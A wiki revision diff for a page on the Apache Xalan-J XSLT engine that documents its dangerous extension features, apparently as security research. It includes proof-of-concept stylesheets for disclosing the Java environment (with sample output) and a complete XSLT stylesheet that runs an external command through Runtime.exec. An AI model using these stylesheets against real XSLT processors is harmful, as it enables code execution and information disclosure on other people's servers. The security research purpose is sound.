Changes for page Engine_XalanJ
on 2012/01/04 18:56
on 2012/01/11 23:21
Summary
-
Page properties (2 modified, 0 added, 0 removed)
-
Attachments (0 modified, 2 added, 0 removed)
Details
- Page properties
-
- Tags
-
... ... @@ -1,0 +1,1 @@ 1 +xslt|engine|apache|java|unsafe - Content
-
... ... @@ -1,21 +1,67 @@ 1 1 [[Xalan-J>>http://xml.apache.org/xalan-j/||rel="__blank" title="Xalan-J Home Page"]] is a Java based XSLT engine by the Apache Project. 2 2 3 3 4 -Supported XSLTversion: 1.04 +== Supported version == 5 5 6 +1.0 6 6 7 - Identificationstrings8 +== Command line == 8 8 9 -| xsl:vendor-url|http:~/~/xml.apache.org/xalan-j 10 -| xsl:vendor|Apache Software Foundation 11 -| xsl:version|1.0 10 +$> java org.apache.xalan.xslt.Process -in foo.xml -xsl foo.xsl 12 12 12 +__Note__ : xml-apis.jar, xercesImpl.jar and xalan*.jar must be in the $CLASSPATH 13 13 14 +== Identification strings == 14 14 15 -Special features 16 +|=xsl:vendor-url|http:~/~/xml.apache.org/xalan-j 17 +|=xsl:vendor|Apache Software Foundation 18 +|=xsl:version|1.0 16 16 20 +== Special features == 21 + 17 17 * File creation 18 18 * Code execution 19 19 * JDBC connectivity 20 -* Java properties 21 -* CheckEnv() 25 +* Java properties disclosure 26 +* Java environment disclosure 27 + 28 +== Java properties disclosure == 29 + 30 +The xsl:system-property() standard function can be called with non standard arguments, mapped to Java properties. 31 + 32 +|=Namespace|=Extension function|=PoC|=Sample output 33 +|http:~/~/xml.apache.org/xalan|checkEnvironment()|[[xalanj-checkenv.xsl>>attach:xalanj-checkenv.xsl]]|[[xalanj-checkenv-output.txt>>attach:xalanj-checkenv-output.txt]] 34 + 35 +== Java environment disclosure == 36 + 37 +The checkEnvironment() extension function (documented [[here>>http://xml.apache.org/xalan-j/faq.html#faq-N10064||rel="__blank"]]) will display some information about the execution context (packages, paths, versions, ...). 38 + 39 +|=Namespace|=Extension function|=PoC|=Sample output 40 +|http:~/~/xml.apache.org/xalan|checkEnvironment()|[[xalanj-checkenv.xsl>>attach:xalanj-checkenv.xsl]]|[[xalanj-checkenv-output.txt>>attach:xalanj-checkenv-output.txt]] 41 + 42 +== Java code execution == 43 + 44 +The attached code will display the current date using a newly created "java.util.Date" object. This should be enough to demonstrate Java code execution. 45 + 46 + 47 +|=Namespace|=Extension function|=PoC|=Sample output 48 +|http:~/~/xml.apache.org/xalan/java/java.util.Date|new()|[[xalanj-java-date.xsl>>attach:xalanj-java-date.xsl]]|Current date: 49 +Wed Jan 11 22:45:07 CET 2012 50 + 51 +== Execution of external commands == 52 + 53 +The following code will execute the command "touch /tmp/hello" : 54 + 55 +<?xml version="1.0"?> 56 +<xsl:stylesheet xmlns:xsl="http:~/~/www.w3.org/1999/XSL/Transform" 57 + xmlns:j="http:~/~/xml.apache.org/xalan/java" 58 + exclude-result-prefixes="j" 59 + version="1.0"> 60 + <xsl:template match="/"> 61 + <xsl:variable name="c"><![CDATA[touch = /tmp/hello]]></xsl:variable> 62 + <xsl:variable name="a" select="j:split($c, ' = ')"/> 63 + <xsl:variable name="r" select="j:java.lang.Runtime.getRuntime()"/> 64 + <xsl:variable name="p" select="j:exec($r, $a )"/> 65 + No content at the moment ... 66 + </xsl:template> 67 +</xsl:stylesheet>
- xalanj-checkenv-output.txt
-
- Author
-
... ... @@ -1,0 +1,1 @@ 1 +xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,0 +1,1 @@ 1 +2.5 KB - Content
-
... ... @@ -1,0 +1,31 @@ 1 +<?xml version="1.0" encoding="UTF-8"?><checkEnvironmentExtension> 2 + <EnvironmentCheck version="$Revision$"> 3 + <environment> 4 + <item key="version.DOM.draftlevel">2.0fd</item> 5 + <item key="java.class.path">/usr/share/java/xalan2.jar:/usr/share/java/xml-apis.jar:/usr/share/java/xercesImpl.jar:/usr/share/java/serializer.jar:/usr/share/java/xsltc.jar</item> 6 + <item key="version.JAXP">1.1 or higher</item> 7 + <item key="java.ext.dirs">/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/ext:/usr/java/packages/lib/ext</item> 8 + <item key="version.xerces2">Xerces-J 2.9.1</item> 9 + <item key="version.xerces1">not-present</item> 10 + <item key="version.xalan2_2">Xalan Java 2.7.1</item> 11 + <item key="version.xalan1">not-present</item> 12 + <item key="version.ant">not-present</item> 13 + <item key="java.version">1.6.0_26</item> 14 + <item key="version.DOM">2.0</item> 15 + <item key="version.crimson">not-present</item> 16 + <item key="sun.boot.class.path">/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/resources.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/rt.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/jsse.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/jce.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/charsets.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/modules/jdk.boot.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/classes</item> 17 + <foundJar desc="apis.jar-apparent.version" name="xml">xml-apis.jar present-unknown-version</foundJar> 18 + <foundJar desc="apis.jar-path" name="xml">/usr/share/java/xml-apis.jar</foundJar> 19 + <foundJar desc="apparent.version" name="xercesImpl.jar">xercesImpl.jar WARNING.present-unknown-version</foundJar> 20 + <foundJar desc="path" name="xercesImpl.jar">/usr/share/java/xercesImpl.jar</foundJar> 21 + <foundJar desc="apparent.version" name="serializer.jar">serializer.jar present-unknown-version</foundJar> 22 + <foundJar desc="path" name="serializer.jar">/usr/share/java/serializer.jar</foundJar> 23 + <foundJar desc="apparent.version" name="xsltc.jar">xsltc.jar present-unknown-version</foundJar> 24 + <foundJar desc="path" name="xsltc.jar">/usr/share/java/xsltc.jar</foundJar> 25 + <item key="version.SAX">2.0</item> 26 + <item key="version.xalan2x">Xalan Java 2.7.1</item> 27 + </environment> 28 + <status result="OK"/> 29 + </EnvironmentCheck> 30 +</checkEnvironmentExtension> 31 +
- xalanj-checkenv.xsl
-
- Author
-
... ... @@ -1,0 +1,1 @@ 1 +xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,0 +1,1 @@ 1 +310 bytes - Content
-
... ... @@ -1,0 +1,11 @@ 1 +<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 2 + xmlns:xalan="http://xml.apache.org/xalan" 3 + version="1.0"> 4 + 5 + <xsl:output method="xml" indent="yes" xalan:indent-amount="4"/> 6 + <xsl:template match="/"> 7 + <xsl:copy-of select="xalan:checkEnvironment()"/> 8 + </xsl:template> 9 + 10 +</xsl:stylesheet> 11 +